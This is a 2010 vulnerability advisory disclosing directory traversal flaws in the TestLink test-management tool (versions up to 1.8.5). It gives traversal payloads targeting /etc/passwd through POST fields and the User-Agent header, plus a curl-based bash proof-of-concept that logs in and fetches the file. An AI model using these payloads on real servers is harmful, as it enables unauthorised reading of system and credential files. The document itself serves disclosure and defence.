1.Title :Multiple directory Traversal Vulnerabilites in Testlink TestManagement and Execution System.
Discovered by: Prashant Khandelwal (clickprashant@gmail.com<mailto:clickprashant@gmail.com>)
Submitted :Jan-15-2010
Bugtraq id : https://www.securityfocus.com/bid/37824
Secunia : http://secunia.com/advisories/38201/
2.Vulnerability Information
Class: Directory Traversal
Remotely Exploitable: Yes
Locally Exploitable: No
3.Vulnerable packages.
Versions affected :All versions <= Testlink 1.8.5
Download : http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc
4.Vulnerability Description
Multiple directory traversal vulnerabilities has been found in Testlink(http://www.teamst.org/) a popular and acclaimed free, open source Test management tool written in PHP.
The issue discovered can only be exploited with an authenticated session.This directory traversal vulnerability is present in the file /testlink/lib/usermanagement/
userInfo.php& In testlink 1.8.4 these issues can be exploited by setting the variable "editUser"& "locale" like below with a HTTP POST request
Example HTTP header for 1.8.5
a)Directory Traversal :The POST variable editUser has been set to ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
POST /testlink/lib/usermanagement/userInfo.php HTTP/1.0
b)Directory Traversal :The POST variable locale has been set to ../../../../../../../../etc/passwd%00.html
POST /testlink/lib/usermanagement/userInfo.php HTTP/1.0
In testlink 1.8.4 these issues can be exploited by setting the variable "genApiKey"& "locale" like below with a HTTP POST request.
Exploit for 1.8.4
a)Directory traverasa : The POST variable locale has been set to ../../../../../../../../etc/passwd%00.html.
POST /testlink/lib/usermanagement/userInfo.php HTTP/1.0
b)Directory Traversal : The POST variable genApiKey has been set to ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
POST /testlink/lib/usermanagement/userInfo.php HTTP/1.0
One of the issues in Testlink 1.8.4 can be exploited by directory traversing with the HTTP User-Agent header like below.
c)Directory Traversal :The HTTP header user-agent has been set to ../../../../../../../../etc/passwd .htm.
GET /testlink/lib/usermanagement/userInfo.php HTTP/1.0
Accept: */*
User-Agent: ../../../../../../../../etc/passwd .htm
Cookie: PHPSESSID=ad966ffbe53232c258f231404cef4552;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cacheResponse
5.Proof of Concept
The below POC has been tested with testlink 1.8.5
#!/usr/bin/env bash
# Prashant Khandelwal [clickprashant@gmail.com<mailto:clickprashant@gmail.com>]
# Remote Directory Traversal in Testlink the Test Management Tool
# Vendor : Testlink http://www.teamst.org<http://www.teamst.org/>
# Affected Version : <=1.8.5(http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc)
# Vulnerability Discovered: 5-Jan-2010
# This POC is for Educational purpose
if [ $# -ne 4 ]
echo "Usage - ./$0User passwordTestlink_root_dir_URIDirectory_traversal_string"
echo "Example - ./$0admin admin http://Testlink-Server/testlink<http://testlink-server/testlink> ../../../../../../../../etc/passwd%00.html"
exit 1
rm -rf cookies output.txt
curl -d "tl_login=$1&tl_password=$2" $3/login.php -c cookies
curl -d "id=1&firstName=Directorytraversal&lastName=Exploit&emailAddress=111-222-1933email%40address%2Etst&locale=$4&editUser=admin" $3/lib/usermanagement/userInfo.php -b cookies -v | more >output.txt
head -n 80output.txt